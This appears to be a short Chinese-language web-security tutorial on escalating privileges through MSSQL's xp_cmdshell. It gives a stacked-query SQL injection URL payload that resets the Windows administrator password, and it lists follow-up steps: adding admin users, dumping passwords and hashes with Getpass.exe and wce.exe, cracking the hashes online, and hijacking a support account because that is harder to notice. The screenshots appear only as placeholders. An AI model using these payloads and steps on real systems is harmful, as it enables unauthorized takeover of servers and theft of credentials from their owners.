Web安全之第三方服务MSSQL提权

MSSQL默认运行在system 权限上，可以通过xp_cmdshell 组件执行系统命令，执行权限继承system权限

 条件:  数据库账号是 DBA权限

XP_cmdshell

 EXEC xp_cmdshell 'whoami';

不仅仅在拿到webshell之后 使用webshell连接数据库 执行这个sql语句，还可以在SQL注入时候，在URL上直接使用xp_cmdshell,因为mmsql可以多语句执行注入。

 例如：index.aspx?id=1;EXEC xp_cmdshell 'net user administrator 132456'; --+

aspx马 有Database 可以链接数据库进行管理

Image.png

Image.png

Image.png

Image.png

添加xp_cmdshell 之后 我们使用xp_cmdshell 执行whoami命令可以看到权限是system

Image.png

接下来 可以

            修改管理员密码
            创建一个新用户 添加到管理员组
            提取当前登录用户密码  （Getpass.exe）
            修改帮助账号（SUPPOTR_338945a0）的密码，并添加管理员组 (比较不容易被发现，推荐使用)
            提取用户密码哈希值（wce.exe）

演示：提取密码hash值

Image.png

Image.png

hash解密网站

http://www.objectif-securite.ch/ophcrack.php

Image.png